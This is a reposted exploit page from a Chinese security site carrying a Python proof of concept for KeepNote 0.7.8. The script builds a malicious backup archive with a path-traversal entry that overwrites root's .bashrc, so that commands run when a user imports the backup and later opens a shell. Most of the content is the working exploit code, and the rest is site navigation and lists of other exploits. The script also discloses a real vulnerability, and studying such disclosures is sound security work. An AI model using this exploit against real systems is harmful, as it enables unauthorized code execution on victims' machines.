首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
KeepNote 0.7.8 - Command Execution
来源:https://twitter.com/r_73en 作者:R-73eN 发布时间:2016-09-30  
# Title : KeepNote 0.7.8 Remote Command Execution
# Date : 29/09/2016
# Author : R-73eN
# Twitter : https://twitter.com/r_73en
# Tested on : KeepNote 0.7.8 (Kali Linux , and Windows 7)
# Software : http://keepnote.org/index.shtml#download
# Vendor : ~
#
# DESCRIPTION:
#
# When the KeepNote imports a backup which is actuallt a tar.gz file doesn't checks for " ../ " characters
# which makes it possible to do a path traversal and write anywhere in the system(where the user has writing permissions).
# This simple POC will write to the /home/root/.bashrc the file test.txt to get command execution when the bash is run.
# There are a lot of ways but i choose this just for demostration purposes and its supposed we run the keepnote application
# as root (default in kali linux which this bug is tested).
#
#
 
 
banner = ""
banner +="  ___        __        ____                 _    _  \n"
banner +=" |_ _|_ __  / _| ___  / ___| ___ _ __      / \  | |    \n"
banner +="  | || '_ \| |_ / _ \| |  _ / _ \ '_ \    / _ \ | |    \n"
banner +="  | || | | |  _| (_) | |_| |  __/ | | |  / ___ \| |___ \n"
banner +=" |___|_| |_|_|  \___/ \____|\___|_| |_| /_/   \_\_____|\n\n"
print banner
 
import tarfile, sys
 
if(len(sys.argv) != 2):
    print "[+] Usage : python exploit.py file_to_do_the_traversal [+]"
    print "[+] Example: python exploit.py test.txt"
    exit(0)
print "[+] Creating Exploit File [+]"
 
filename = "KeepNoteBackup.tar.gz"
 
path = "../../../../../../../home/root/.bashrc"
 
tf = tarfile.open(filename,"w:gz")
tf.add(sys.argv[1], path)
tf.close()
 
print "[+] Created KeepNoteBackup.tar.gz successfully [+]"
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·VLC Media Player 2.2.1 - Buffe
·Grandsteam GXV3611_HD - SQL In
·FreePBX < 13.0.188 - Remote Co
·DWebPro 8.4.2 - Multiple Vulne
·Linux Kernel 4.6.3 Netfilter P
·Apache Tomcat 8/7/6 (Debian-Ba
·Android Stagefright MP4 tx3g I
·Street Fighter 5 - 'Capcom.sys
·Metasploit Web UI Static secre
·Disk Pulse Enterprise 9.0.34 -
·Metasploit Web UI - Diagnostic
·ISC BIND 9 - Denial of Service
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved